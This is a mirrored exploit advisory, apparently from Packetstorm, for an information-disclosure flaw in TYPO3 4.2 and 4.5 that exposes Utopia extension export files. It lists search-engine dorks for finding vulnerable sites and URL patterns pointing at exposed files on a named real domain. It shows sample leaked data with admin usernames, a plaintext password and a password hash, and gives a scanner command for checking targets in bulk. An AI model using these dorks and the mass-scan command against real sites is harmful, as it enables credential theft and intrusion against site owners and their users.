Lucene search

K

Typo3 4.2 / 4.5 Information Disclosure

πŸ—“οΈΒ 14 Oct 2015Β 00:00:00Reported byΒ Cleiton PinheiroTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 50Β Views

Typo3 4.2 / 4.5 Full Information Disclosur

Show more
Code
`*INFORMAÇÕES:*  
  
# ----------------------------------------------------------  
  
#[+] Name: (0day) Typo3 - Full Info Disclosure  
  
#[+] Type: Full Info Disclosure  
  
#[+] Vendor: https://typo3.org/typo3-cms/  
#[+] VULNERABLE VERSIONS: 4.2, 4.5  
  
# ----------------------------------------------------------  
  
#[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL #[+] EMAIL:  
[email protected] #[+] Blog: http://blog.inurl.com.br #[+] Twitter:  
https://twitter.com/googleinurl #[+] Fanpage: https://fb.com/InurlBrasil  
#[+] Pastebin http://pastebin.com/u/Googleinurl #[+] GIT:  
https://github.com/googleinurl #[+] PSS:  
http://packetstormsecurity.com/user/googleinurl #[+] EXA:  
http://exploit4arab.net/author/248/Cleiton_Pinheiro #[+] YOUTUBE:  
http://youtube.com/c/INURLBrasil #[+] PLUS: http://google.com/+INURLBrasil  
#[+] IRC: irc.pΕ•iv8.jp <http://irc.xn--piv8-q4a.jp> / #inurlbrasil  
  
  
#[+] SEARCH DORKS:  
  
/fileadmin/utopia ext:xml  
  
/fileadmin/utopia*.t3d.xml  
site:fr /fileadmin/utopia ext:xml  
"utopia" inurl:t3d ext:xml  
/fileadmin/ typo3 ext:t3d  
  
# ----------------------------------------------------------  
  
  
*#[+] POC FILE .XML:*  
  
  
http://{server}/fileadmin/utopia{random}.t3d.xml  
  
http://{server}/subdir/fileadmin/utopia{random}.t3d.xml  
  
*#[+] **Ex:*  
  
http://vull.fr/fileadmin/utopia4cb2c07e326f4.t3d.xml  
  
http://vull.fr/subdir/subdir2_/fileadmin/utopia506c4cd063fa0.t3d.xml  
*#[+] PRINT:*  
https://3.bp.blogspot.com/-cfVOTa_fbmQ/Vh3kC8v14cI/AAAAAAAABaA/kDEy3Ui9Mbg/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A12%253A34.png  
  
*#[+] POC FILE .**T3D:*  
  
http://{server}/fileadmin/*.t3d  
  
http://{server}/fileadmin/archives_site/*.t3d  
  
http://{server}/subdir/fileadmin/*.t3d  
  
*#[+] **Ex:*  
  
http://vull.fr/fileadmin/archives_site/utopia_Inscription%20lilas%20autopartage.t3d  
  
http://vull.fr/subdir/fileadmin/archives_site/utopia_autotao.t3d  
  
  
*#[+] **Example file contents:*  
  
s:11:"admin_xxxx";s:5:"email";s:26:"[email protected]";s:8:"username";s:10:"adminxxx";s:8:"password";s:10:"adminlilas";s:7:"origUid";a:2:{i:0;s:2:"10";i:1;s:14:"Administrateur";}}}}i:3;a:1:{s:8:"fe_users";a:1:{i:100;a:4:{s:4:"name";s:10:"user_xxx";s:5:"email";s:26:"[email protected]";s:8:"username";s:9:"userxxx";s:8:"password";s:32:"dcd9e367d292b7019fab159ab8c8c26a";}}}i:4;a:1:{s:17:"tx_icsutopia_site";a:1:{i:1;a:4:{s:6:"level0";s:2:"72";s:6:"level1";s:2:"73";s:6:"level2";s:3:"232";s:10:"base_model";s:9:"72,73,232";}}}}s:3:"t3d";s:43:"/www/html/typo3temp/utopia519e1b3d6c76b.t3d";}}s:15:"relStaticTables";a:1  
  
  
*#[+] **Validation in mass using SCANNER INURLBR**:*  
*# Download: **https://github.com/googleinurl/SCANNER-INURLBR  
<https://github.com/googleinurl/SCANNER-INURLBR>*  
  
*#[+] **COMMAND:*  
php inurlbr.php --dork '/fileadmin/utopia*.t3d.xml' -s t3d.txt -t 2 -a  
'<username>'  
  
*#Result print:*  
https://3.bp.blogspot.com/-JBREv-QJRRc/Vh3oH-HnhlI/AAAAAAAABaM/eXzM1uUOcxk/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A29%253A37.png  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo